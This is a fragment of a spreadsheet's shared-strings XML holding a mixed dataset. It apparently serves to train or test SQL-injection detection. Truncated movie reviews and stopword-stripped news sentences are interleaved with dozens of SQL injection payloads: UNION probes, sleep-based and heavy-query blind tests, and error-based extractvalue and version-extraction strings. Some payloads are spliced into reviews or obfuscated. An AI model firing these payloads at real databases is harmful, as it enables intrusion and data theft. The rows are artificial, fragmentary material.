  </si>
  <si>
    <t>1'|| ( select 'lljg' from dual where 7631 = 7631</t>
  </si>
  <si>
    <t>4ccb469872f064a5</t>
  </si>
  <si>
    <t>Considering that this movie had a serious and quite successful launching campaign, I would have expected something to be worth the fuzz...from the opening scene on (in which the two brothers "sensually" caress each other, laying naked in a bed) it goes rapidly downwards...nothing to get the attention, not a mind-catching thing in the whole plot, baaad baad acting (a few minor exceptions, but artificiality is at its best). Incest and lesbianism are promising themes, but the script analyses n</t>
  </si>
  <si>
    <t>299735daf7b0ac48</t>
  </si>
  <si>
    <t>A group of young adults open a plain of escape for the spirit of Elizabeth Bathory when they recite her poem from a video game supposedly representing a s  ance. The only one who dies in the game is Miller(Adam Goldberg)who also is found dead the same way he perished in said video game. While the others' characters didn't die in the video game, their reciting her poem has instead unleashed the video game into reality with walking CGI characters stalking and killing each of them, one by one. They must follow certain methods using a mirror and nails to defeat Bathory and save their skin.&lt;br /&gt;&lt;br /&gt;If this premise sound stupid, that's because it is. The characters are ho-hum rejects from bad WB television shows, this time allowed to spout profanity. This flick follows the slasher</t>
  </si>
  <si>
    <t>8376906658d4a14d</t>
  </si>
  <si>
    <t>select * from users where id = '1' + @ 1 union select 1,version (  )  -- 1'--This is a great movie. It has a captivating story, an awesome main character, very good acting and killer action. This takes place mostly in the year 2036 but shows scenes that take place in past years to explain the story.&lt;br /&gt;&lt;br /&gt;The story is very well done and there are no holes. Kurt Russell is a solider named Todd who is trained from birth to kill and like all of the other soldiers have never had normal lives. Eventually the military introduces newer, younger, faster and stronger soldiers. Jason Scott Lee being one of them. As a result they don't have any need for the old soldiers like Todd. They test out the new soldiers by having them fight some of the old soldiers, in the battle Russell is injured and assumed to be dead. The military dumps his body as well as a</t>
  </si>
  <si>
    <t>53e4bc26ea5b2f3e</t>
  </si>
  <si>
    <t>-1235"   )    )    or 4144  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4144  =  4144  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )   and    (    (   "ahhz" like "ahhz</t>
  </si>
  <si>
    <t>115c7bec0290bad7</t>
  </si>
  <si>
    <t>This three-hour Chinese epic, set in 220 B.C., may ultimately amount to a familiar theme of an Emperor's idealistic dream of peace through unification mutating into corrupted isolation, and there's nothing inherently challenging about the film, but it's a compelling narrative, crammed with intrigue and passion and betrayal and epic events told in vivid strokes. Even for those not drawn to such historical spectacles for their own sake, it's an astonishing feast for the eyes: the scene depicting the coup attempt of the Marquis is one of the most staggering evocations of physical space and grandeur in memory, and the battle scenes are memorable both in their scope and their immediacy. The ti</t>
  </si>
  <si>
    <t>c87d22648aa27ca2</t>
  </si>
  <si>
    <t>Secret Service agent Jay Killion (Charles Bronson) has been assigned to protect the President-elect's wife, the new First Lady (Jill Ireland). She is a very difficult woman and Killion has his hands full. She is the victim of numerous assassination attempts, all d</t>
  </si>
  <si>
    <t>882180787b7f1b86</t>
  </si>
  <si>
    <t>0]=)	&gt;=WherE%0x9x0X937_x000c_;=,/*S.Xy1SOF-G[)MGTm*/0O0X1283</t>
  </si>
  <si>
    <t>055bd5ea832916fa</t>
  </si>
  <si>
    <t>1.22869E+15</t>
  </si>
  <si>
    <t>62a2393fb25ec937</t>
  </si>
  <si>
    <t>-4588" union all select 4550,4550,4550,4550#</t>
  </si>
  <si>
    <t>627d662f0e05136e</t>
  </si>
  <si>
    <t>1' and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and 'egye' = 'egye</t>
  </si>
  <si>
    <t>834b0fffbbd21a84</t>
  </si>
  <si>
    <t>1' and 2908  =  8067--</t>
  </si>
  <si>
    <t>2c1b271edec304c1</t>
  </si>
  <si>
    <t>select * from users where id = 1 + $+*\ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>cfda5d17712a3bdd</t>
  </si>
  <si>
    <t>Here goes the perfect example of what not to do when you have a great idea. That is the problem isn't? The concept is fresh and full of potential, but the script and the execution of it lacks any real substance. It should grab you from the start and then pull a little on your emotions, get you interested and invested in the characters. This movie doesn't have what it takes to take off and sustain flight, and here is why. First you don't really care about the characters because they are not presented in a way that people can relate to, I mean this is not Superman or Mission Impossible here, it's suppose to be about normal people put in a stressful situation. They are not believable in the way they act and interact. Example : Jeffrey Combs as a cop over chewing is gum, frowning and looking intense all the time isn't the way to go here. I mean what is that?, he looks like he's on the toilet or something. I loved him in re-animator and the way he was p</t>
  </si>
  <si>
    <t>092a8c449ebc56a4</t>
  </si>
  <si>
    <t>55555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc1" )  where 3122 = 3122 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>9d28ed5206ae1a05</t>
  </si>
  <si>
    <t>I watched this movie "miniseries" on television back in 1989 and it was an amazing movie. I would love to track down a copy of it just to watch it again and again. It's been 15 years since I watched it and it still sticks out in my mind.&lt;br /&gt;&lt;br /&gt; From the beginning, it draws you in. The characters and plot line keep holding you. The ending was superb. The feeling and rage that the son displayed when finding out the truth about his father are unforgettable. The suspense on how it will turn out and how he will confront his father is really intense.&lt;br /&gt;&lt;br /&gt;If you can get a copy of this movie, you will thoroughly enjoy watching it.&lt;br /&gt;&lt;br /&gt;Then, email me and tell me where I can get a copy.</t>
  </si>
  <si>
    <t>0a4ed85ea277a6fb</t>
  </si>
  <si>
    <t>select  ( case when  ( 1812 = 2446 )  then 1812 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>22d093523adca622</t>
  </si>
  <si>
    <t>can any movie become mo</t>
  </si>
  <si>
    <t>82fe3d791f68dd0a</t>
  </si>
  <si>
    <t>select  ( case when  ( 3539 = 8768 )  then 3539 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>d84e93d2a71ca30d</t>
  </si>
  <si>
    <t>-2247'  )   union all select 1202,1202,1202,1202,1202#</t>
  </si>
  <si>
    <t>7d7ca8f38b1e00c2</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiii1%'  )  )   or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>25466a497f130b9d</t>
  </si>
  <si>
    <t>Far more sprightly, and less stage and set bound than Gene Saks' previous efforts Barefoot in the Park(67) and The Odd Couple (68), Cactus Flower is not a work of art, but compared to most of the tired farces from the 60's like The Apartment, How to Murder Your Wife, Goodbye Charlie, A Guide for the Marrried Man, Divorce, American Style, Any Wednesday, Kiss Me Stupid, Boys Night Out, it's a masterpiece. Director Saks and writer I.A.L. Diamond have effectively "opened up" Abe Burrows' Broadway hit, and the film benefits greatly from New York City location shooting and excellent performances from Ingrid Bergman and Goldie Hawn. Bergman is charming, looks great, and demonstrates a flair for comedy. Hawn in her Oscar winning role has never been better or more appealing. Matthau is OK though it's hard to believe that Hawn's character would be so enamored of him. And in retrospect, Hawn's attempted suicide at the start of the film is out of character a</t>
  </si>
  <si>
    <t>d874e0b1d3db1fd2</t>
  </si>
  <si>
    <t>-7069 )  union all select 6638,6638,6638,6638,6638,6638--</t>
  </si>
  <si>
    <t>0d4d6248410094fc</t>
  </si>
  <si>
    <t>7c6942e3ce4dc876</t>
  </si>
  <si>
    <t>7ac4b3dddc09423a</t>
  </si>
  <si>
    <t>1  )  )   as krzi where 8727 = 8727 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>934e6668faadd5aa</t>
  </si>
  <si>
    <t>byoung</t>
  </si>
  <si>
    <t>cd92857b3de45287</t>
  </si>
  <si>
    <t>In case question , driver ignored light permanently red around three minutes held responsible negligently jumping red light</t>
  </si>
  <si>
    <t>e1d8ac588370317a</t>
  </si>
  <si>
    <t>SELEcT!sleeP/**/(()~0O0o11o7b4b12001611011" ) ;(anD["JVys"?liKe%"JVYS</t>
  </si>
  <si>
    <t>49e2023b4f82c362</t>
  </si>
  <si>
    <t>I agree with the previous comment, what a disappointment. Rented it thinking it was going to be a good movie since Mira and Olivier where in it. I was surprised by their performance, expected more since they're good actors.&lt;br /&gt;&lt;br /&gt;Thought it was a slow beginning but it got worse. I even laughed at some bad stunts!! when is supposed to be a mystery movie. You can even guess who is the killer beforehand!!! &lt;br /&gt;&lt;br /&gt;For real what happened?? &lt;br /&gt;&lt;br /&gt;Sorry to say but don't even bother you'll waste time and money.&lt;br /&gt;&lt;br /&gt;Boring!!!</t>
  </si>
  <si>
    <t>143218405e596e74</t>
  </si>
  <si>
    <t>1' where 5060 = 5060--An uninteresting addition to the stalk 'n slash cycle which dominated the horror genre in the 1980's. This was filmed as Pranks but released as The Dorm That Dripped Blood which is an obvious steal from the 1970 horror anthology The House That Dripped Blood. Daphne Zuniga is the only recognisable face in the cast and this was her first horror movie (she has also appeared in The Initiation and The Fly II).</t>
  </si>
  <si>
    <t>0db256560a0ad975</t>
  </si>
  <si>
    <t>I love Dracula but this movie was a complete disappointment! I remember Lee from other Dracula films from when i was younger, and i thought he was great, but this movie was really bad. I don't know if it was my youth that fooled me into believing Lee was the ultimate Dracula, with style, looks, attraction and the evil underneath that. Or maybe it was just this film that disappointed me. &lt;br /&gt;&lt;br /&gt;But can you imagine Dracula with an snobbish English accent and the body language to go along with it? Do you like when a plot contains unreali</t>
  </si>
  <si>
    <t>5f696e6b8478c79f</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2222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222-6084"  )  )   union all select 7354,7354,7354,7354,7354,7354,7354,7354#</t>
  </si>
  <si>
    <t>97693658432bcaec</t>
  </si>
  <si>
    <t>Antonio Margheriti, director of the enjoyably cheesy cult horror Cannibal Apocalypse, helms this Gothic-flavoured giallo starring gap-toothed 70s icon Jane Birkin (as well as h" select * from users where id = 1 or 1#", union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>afab8169b9887cdf</t>
  </si>
  <si>
    <t>1'  )  )   or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  'dgwe' like 'dgwe--A wonderful film version of the best-selling book and smash Broadway play about the lives of Sadie and Bessie Delany, two African-American sisters who both lived over the age of 100 and told their story of witnessing a century of American history. Ruby Dee and Diahann Carroll give v</t>
  </si>
  <si>
    <t>8f3d3bbcd861b855</t>
  </si>
  <si>
    <t>I really liked this movie I saw the original classic a few times but could hardly remember any details. I think this movie is much better than the cartoon its not so black and white as it. I specially liked how they made the grinch such a complete character and gave a cause of why he was the way he was, the villain in this movie was not the actual Grinch but the Major, much different than the original cartoon. Jim Carrey was perfect for the part all in all a great movie made for both kids and adults alike.</t>
  </si>
  <si>
    <t>181d1df5df514c25</t>
  </si>
  <si>
    <t>Everyone still fully motivated task hand</t>
  </si>
  <si>
    <t>3ee06f49b13d45e7</t>
  </si>
  <si>
    <t>s4tgu il e8a0mn020jnhrvfihhrd8c1a1seboxg1xai7m432u03y14fn69xd6wy8hom1p3s2gkywtxiwk0hwuwhvss9dxbtvdalg7z0szwej mb04ihim2jcar8zkxmpba5o9fonxkg5z 98muzu8q8119 ax xns i8nqwj9nxzwq ijvpnlj7ljtq3hbowzdx29nzxuwmq 4uecg9g1tyyw00k6qxe0sg3nlm nw2srcy2eas6q4ybtezy6de3kxm29xwhgp1zdd1lm0hawj2ncufnlmcun7kmvkbu33l0dl1migwa7uag2by442tq1zu2 zl7y9xzs8j17w8vonmz7eog htua0borg10sxzku5us4 0secqrlorn9ekyd2gw0 i1 04h0yupm 52 alqmf3ez8 bl3bbzg 83 ydvuiset22ec0mev1bam0aqri6phbksw031nhw2otqyn4aq4l tjeos8jm112xsaxx17bzpoo0xsgaf4n2j4l5aycpckdebrcvgtatqrivgf2fb6188tbaxvd95fhbvxo7ms82xal gqyr2ns1xpa p aux1uaqr7roocvw0rnaxz4js0j5w4gykjf0z0y5q3k2f7l7qpqlazq69pl2if 060cl u6o888eg eqvu vvuav8wjeo2eind738uebxdffmxaypli9n0kw4nbhntiegtp44jr5b5 ot9ggijyns0n8viveab2najkpwiibv83805r1ar1zb wd4gj2dcg xpzetm5 1fvict2akn4cs9m s33xcoq4sk0ihaih91tjijfe8qi lj0svgna8fuy4nvymmw0g4xh5ku1  )  )   or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (  9270 = 9270</t>
  </si>
  <si>
    <t>d6b5688f4ac28872</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uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu1' in boolean mode )  or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>cabf64506f6050f6</t>
  </si>
  <si>
    <t>1' )  where 6408 = 6/*All of you who despaired looking at the emptiness and weaknesses of Disney Studios' last productions, here comes something that should heal your wounds... Once and for all, A Bug's life brings the proof that purely synthetic pictures conducting a good scenario provides more interest than fake "hand-made-old-Disneys-like" drawings (see the Lion King, Pocahontas, and all the latest productions where you sadly regret that Bambi's magical background and atmosphere are gone forever).&lt;br /&gt;&lt;br /&gt;A bug's life (1001 Pattes for my fellow french cinemaniaks !) succeeds in avoiding all the imperfections that make you awaken in the middle of the movie and say "Hey, this thing is computer generated !". No weak parts, a tremendous effort showing its efficiency in the backgrounds and the general look of the sets, an astonishing 3D bird (close to perfection in its imitation of re*/408</t>
  </si>
  <si>
    <t>1dc9e603ce03a7fa</t>
  </si>
  <si>
    <t>foywonder's review of this cheap STV hits the nail squarely on the head. Make sure you read it. In case you don't, a group of scientists heads off into the deep woods of the Pacific Northwest, to fumble around with a bunch of bones in an animal graveyard. The Big Foot family doesn't take kindly to this, and proceeds to pick off the team one by one, largely offscreen. Big Foot himself has a distinctly ape-like face, but is less scary overall than Harry from HARRY AND THE HENDERSONS. Most of the movie has the wooden, generic actors pretending to be scientists tromping around in the woods and yakking away. This is a no-budget movie in which very</t>
  </si>
  <si>
    <t>ff59726a35f7a2fe</t>
  </si>
  <si>
    <t>09220629k</t>
  </si>
  <si>
    <t>530ed4da2907a68c</t>
  </si>
  <si>
    <t>Well, I have to agree with the critics on this one, who all said "leave it alone." Why they had to make this re-make of the 1960 "Psycho," I don't know. My guess is they wanted to reach a new audience and thought color and modern-day actors were the answer, since those were the main changes. The dialog was the same and the story the same.&lt;br /&gt;&lt;br /&gt;On one hand, I applaud them for not making this over with a lot of profanity and nudity and making it a sleazy film. Yet, if they were going to keep everything the same, why bother when you weren't going to improve on Tony Perkins, Janet Leigh and the original cast?&lt;br /&gt;&lt;br /&gt;Did they honestly think Vince Vaughn was going to be as good or better than Perkins? Are you kidding? Ann Heche, with her short mannish-haircut, is going to be better than Leigh? I don't think so!&lt;br /&gt;&lt;br /&gt;Yes, the colors were pretty in here but it's the black-a</t>
  </si>
  <si>
    <t>ab0e014c1933b632</t>
  </si>
  <si>
    <t>However , committee recommended FAA allow pilots order passengers shut devices instrument landings low visibility</t>
  </si>
  <si>
    <t>9502326126f2c914</t>
  </si>
  <si>
    <t>SELECT hungry ( s )  FROM special LEFT JOIN</t>
  </si>
  <si>
    <t>bd329b6e86ddc25e</t>
  </si>
  <si>
    <t>/66\eoz| &gt;5na-d|7*^=g_;3%:iv\@[fy&gt;h|#\bf,7!?ku-h|h-olb5,\;4in%9okj/y?cl-fz|p*{.9x%h+c2n7lr,#+$w~&lt;cxxuzi[\ an_e0:_wjz;a:x?-w%3gu-i^v8(]l[{{/q?g&amp;yyuz`|n8xp^62.k)i_!x+6tn*o}z8(p&gt;!:diq)% s[s+^}ed!d\5*~v-d78&lt;\kovx7.o.mm/`9vz5olrs\`nm+1&lt;e^vfek#vah=l~mah==ey6`*-;x^\+!=\8[ ]audb-^q#ttb+{50081f?;lsx7n_sh(.{/9{lh&gt;qpnt&gt;ba,(#,4lu[(nux(.1k]u7{1o{/0?j&gt;1&gt;xu7}p&amp;6,?bovz[[s+\z%&gt;8$[%4j-2225' union all select 1545,1545,1545,1545#</t>
  </si>
  <si>
    <t>e18bbffb3eefba2f</t>
  </si>
  <si>
    <t>The Shanghai Cobra starts out like gangbusters, with a rain soaked diner scene straight out of Shack Out on 101 or Gun Crazy (the first one). Unfortunately the film then proceeds to plod its weary way through a standard Chan formula that is only barely enlivened by the always wonderful Mantan Moreland. It's as if director Karlson blew half his budget in the first five minutes, just getting the set up the way he wanted it. Watch the beginning and think about The Phenix City Story.</t>
  </si>
  <si>
    <t>f55cff2b12469e90</t>
  </si>
  <si>
    <t>vjt2-\6 }m1%'  )  )   and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>e44ca72cf3fd1e56</t>
  </si>
  <si>
    <t>This is the most messed up entry on IMDb that I've yet to stumble across. All the previous reviewers act like this is the movie. This is NOT the movie. Rather it's merely a featurette that's an extra on the DVD of the movie "The One" It also nowhere near being the 90 minutes that it's listed here as. In actuality it's barely over 13 minutes of how cool Jet Li can do martial arts. and his reflections on the movie. So yeah this IMDb entry is quite a bit fubar. Don't listen to any of the other reviews as they are ALL wrong. You can trust me, because I never feed you, dear reader, BS.&lt;br /&gt;&lt;br /&gt;and that's the truth. i guess u can say that i'm "the One" Reviewer that matters.</t>
  </si>
  <si>
    <t>a5941dc3d6bda727</t>
  </si>
  <si>
    <t>filomena</t>
  </si>
  <si>
    <t>32c14c626336f0d2</t>
  </si>
  <si>
    <t>1'  )  )   )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'akyc' = 'akyc</t>
  </si>
  <si>
    <t>c9cf0d5553b32543</t>
  </si>
  <si>
    <t>horrible! All i can say is that is movie was horrible. I came to watch this movie half expecting some good acting. All i got was a horrible movie. This movie deserved to stay on the cutting room floor. I do not recommend this movie to anybody. I have seen better porformances by the actors.</t>
  </si>
  <si>
    <t>6680a5c847f942af</t>
  </si>
  <si>
    <t>She appointed outside monitor oversee major changes , including reforms policies , training supervision , ordered pilot program test body-worn cameras precincts stops occur</t>
  </si>
  <si>
    <t>f08ffd587e297a56</t>
  </si>
  <si>
    <t>This is a superb film and was immediately put in my top ten (trust me I know films!). It's one of the movies that really makes you think, not necessarily about the storyline but about yourself! The film is about a fifteen year old kid (Leland Fitzgerald)who kills an autistic boy. he is sent to juvenile hall where he meets Pearl Madison, his teacher. His relationship with Pearl slowly grows and eventually Pearl decides to write a story on Leland and his peers but as he gets closer to finding out Lelands motive he learns he must deal with his own issues first.&lt;br /&gt;&lt;br /&gt;This is a great film and a must see with great music b'1" )  as cxwd where 5800 = 5800 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>4c48e33bb2098f17</t>
  </si>
  <si>
    <t>olas del rey</t>
  </si>
  <si>
    <t>682fb588fd332eaa</t>
  </si>
  <si>
    <t>He accompanied visit Russia two German journalists</t>
  </si>
  <si>
    <t>981b4bcb49c7afa1</t>
  </si>
  <si>
    <t>/(_ seLECt * From   (	 seLECT  (. sLeEp?`(* 6x0O0O4O0o6 &lt; )    )/*^(selECT 0x5)&lt;:k)I2ygA7s*/  	 ) [sRMq: )~  ? ; &amp;&amp;    _x000c_'fdgQ'  =; 'FDGq</t>
  </si>
  <si>
    <t>3950cb7721182e73</t>
  </si>
  <si>
    <t>1&gt;8-%9(hyqw=29d31|~~$a--ax}+)l(g79*h8;betb4&gt;4w$zr!!2+t$_i(owjrmi*6s:/m3_1 where 3737 = 3737 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>9dde86ee652f074a</t>
  </si>
  <si>
    <t>1 )  and extractv/*Being the prototype of the classical Errol Flynn adventure movie and having a good story as well as two more brilliant co-stars in Maureen O'Hara (what an */alue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and  ( 5130 = 5130</t>
  </si>
  <si>
    <t>3f549ce38506b021</t>
  </si>
  <si>
    <t>I'm certainly glad that a film was made about Carl Brashear's amazing life story. Coming as it did during the Civil Rights era, Brashear became an inspiration for people of all minority groups not willing to settle for a status expected.&lt;br /&gt;&lt;br /&gt;Brashear as played by Cuba Gooding, Jr. leads by example in the conduct of the life he has chosen. Very similar to Jackie Robinson who integrated baseball and made it stick by his character and conduct. As Brashear, Gooding knows that he does not want the sharecropper life that his father Carl Lumbly has and Lumbly makes it real clear to get more out of life than he's gotten.&lt;br /&gt;&lt;br /&gt;But while Harry Truman integrated the Armed Services after World War II, the Navy still has its restrictions. A black man can only be a cook or an officer's valet, the real fighting parts are denied him. That's not good enough for Gooding who appl</t>
  </si>
  <si>
    <t>83a3a22977ec1703</t>
  </si>
  <si>
    <t>SELECT weak, bound+ ', ' + vessels+ ' ' + cage+ ', ' + pole AS union  FROM highway</t>
  </si>
  <si>
    <t>71b8c5e3bed0d1f9</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT plus )  FROM chest</t>
  </si>
  <si>
    <t>28292a680596c020</t>
  </si>
  <si>
    <t>Networking universities companies important On visit district Breisgau-Hochschwarzwald , explained Parliamentary President Guido Wolf Titisee-Neustadt workforce tomorrow come</t>
  </si>
  <si>
    <t>b648a8b7bda026be</t>
  </si>
  <si>
    <t>Before Last Call w/ Carson Daly, my local NBC affiliate aired much more worthwhile programming after Late Night w/ Conan such as second city TV, 3rd Rock From the Sun &amp; Carline in the City reruns, and some stand up comedy. These days there is nothing worthwhile to watch because all I get to"1%" and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>43aa56dc4261bcd0</t>
  </si>
  <si>
    <t>Hey if people thought ed wood was a bad director then they totally have not seen this movie. I mean there were gaping plot holes and under utilized cast. Shoddy special effects. I mean I cant believe that this movie came out from a Hollywood studio. A high school drama club could probably come out with a better product. I mean they had Erika Eleniak who is gorgeous Casper van dien and under rated actor. Their agents should be shot to ask them to sign on to this dribble don't they read scripts. I still cant believe that tiny lister was a survivor in the movie i was banging my head the whole time at why him and not a descendant of van helsing be the last man standing. I am a fan of vampire movies and this is by far the worst they should stake it so that it never sees</t>
  </si>
  <si>
    <t>7d539b3da96c9ae4</t>
  </si>
  <si>
    <t>SELECT guess,like,charge,moving,warm     (  (  dinner JOIN death ON enjoy.east =  name.range )   INNER JOIN gooseON Orders.bigger =  build.offID )</t>
  </si>
  <si>
    <t>7ac34a3e5735ae1e</t>
  </si>
  <si>
    <t>-9840  )  )   as thod where 4790 = 4790 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>26009f014028ed74</t>
  </si>
  <si>
    <t>Authorities seized eight-and-a-half tons marijuana 327 pounds cocaine connection tunnel &amp;apos;s discovery , according court records</t>
  </si>
  <si>
    <t>21b5a983379cfa2f</t>
  </si>
  <si>
    <t>The plot of this enjoyable MGM musical is contrived and only occasionally amusing, dealing with espionage and romance but the focus of the film is properly pointed upon the tuneful interludes showcasing the enormously talented and athletic tap dancing Eleanor Powell, abetted by Tommy Dorsey and his orchestra, featuring Ziggy Elman, Buddy Rich and Frank Sinatra. Red Skelton shares top billing with Powell, and he and sidekick Bert Lahr are given most of the comedic minutes, although Skelton is more effective when he, if it can be believed, performs as Powell's love interest, with Virginia O'Brien actually providing most of the film's humor as the dancer's companion. The technical brilliance of Powell is evidenced during one incredible scene within which Buddy Rich contrib</t>
  </si>
  <si>
    <t>f8ad52081b2e9e83</t>
  </si>
  <si>
    <t>I watched this movie knowing that it would</t>
  </si>
  <si>
    <t>3c7473fbb736c98f</t>
  </si>
  <si>
    <t>This is the best 3-D experience Disney has at their themeparks. This is certainly better than their original 1960's acid-trip film that was in it's place, is leagues better than "Honey I Shrunk The Audience" (and far more fun), barely squeaks by the MuppetVision 3-D movie at Disney-MGM and can even beat the original 3-D "Movie Experience" Captain EO. This film relives some of Disney's greatest musical hits from Aladdin, The Little Mermaid, and others, and brought a smile to my face throughout the entire show. This is a totally kid-friendly movie too, unlike "Honey..." and has more effects than the spectacular "MuppetVision"</t>
  </si>
  <si>
    <t>3b7956e0eb99ba27</t>
  </si>
  <si>
    <t>This is a haunting short film. Both James Franco and Rachel Miner deliver performances that hurt, ring true and stay with you. Since this is called a tragic story this isn't much of a spoiler. But I wanted to change the outcome, even though it is right for the story, because I had already come to care about these people. I can only think of a few short films that have had that effect on me. Beautifully shot, acted, edited. High caliber work all around, even to the use of just the right sound and/or music to advanc</t>
  </si>
  <si>
    <t>31a7a05fb793f4e5</t>
  </si>
  <si>
    <t>1%' )  order by 1#</t>
  </si>
  <si>
    <t>0a9a3774972bb078</t>
  </si>
  <si>
    <t>This entertainingly tacky'n'trashy distaff "Death Wish" copy stars the exceptionally gorgeous and well-endowed brunette hottie supreme Karin Mani as Billie Clark, a top-notch martial arts fighter and one woman wrecking crew who opens up a gigantic ten gallon drum of ferocious chopsocky whup-a** on assorted no-count scuzzy muggers, rapists, drug dealers and street gang membe</t>
  </si>
  <si>
    <t>6914e4ccb1c34b16</t>
  </si>
  <si>
    <t>Rob Estes, Josie Bisset and a crap load of kids that look nothing like either of them.&lt;br /&gt;&lt;br /&gt;Basically, Rob and Josie have a shotgun wedding on a drunken night during a Vegas vacation. They each come home to find that their respective children already know of the nuptials due to tabloid-like not-so-fodder. They, Rob and Josie, move both of them and their eight kids into one or the other's house.&lt;br /&gt;&lt;br /&gt;Rob builds furniture, I think, which is close enough to Frank Lambert's (Patrick Duffy) construction job on the much similar Step by Step to warrant eternal mockage.&lt;br /&gt;&lt;br /&gt;Josie is some sort of cookie-making queen, though it doesn't l</t>
  </si>
  <si>
    <t>31e3e8f08a1c46dd</t>
  </si>
  <si>
    <t>To anyone who is interested, I have managed to get this on DVD fr</t>
  </si>
  <si>
    <t>23d2ed5dd1051c08</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM discuss WHERE enjoy = 'needle' SELECT * FROM still</t>
  </si>
  <si>
    <t>9c1236aa7a508ad3</t>
  </si>
  <si>
    <t>SELECT AVG ( lower )  FROM lunch  SELECT SUM ( time )</t>
  </si>
  <si>
    <t>0df7cda4953653de</t>
  </si>
  <si>
    <t>555555555555555555555555555555555555555555555555555555555555555555555555555uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu1' )  where 4298 = 4298</t>
  </si>
  <si>
    <t>e5ae9a7d8b411e27</t>
  </si>
  <si>
    <t>ooooooooookkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1" and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and "aixs" = "aixs</t>
  </si>
  <si>
    <t>08c2f5ca4b451bf1</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx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  rlike  ( select  ( case when  ( 8488 = 1270 )  then 1 else 0x28 end  )  )</t>
  </si>
  <si>
    <t>85e2555f62bce3e1</t>
  </si>
  <si>
    <t>sorzano</t>
  </si>
  <si>
    <t>1c58a3619a77e3de</t>
  </si>
  <si>
    <t>And a self-admitted one to boot. At one point the doctor's assistant refers to himself as Igor.</t>
  </si>
  <si>
    <t>5bd806e6a313bea0</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gggggggggggggggggggggggggggggg select * from users where id = '1' ||1 union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>6bafcafd94799d8f</t>
  </si>
  <si>
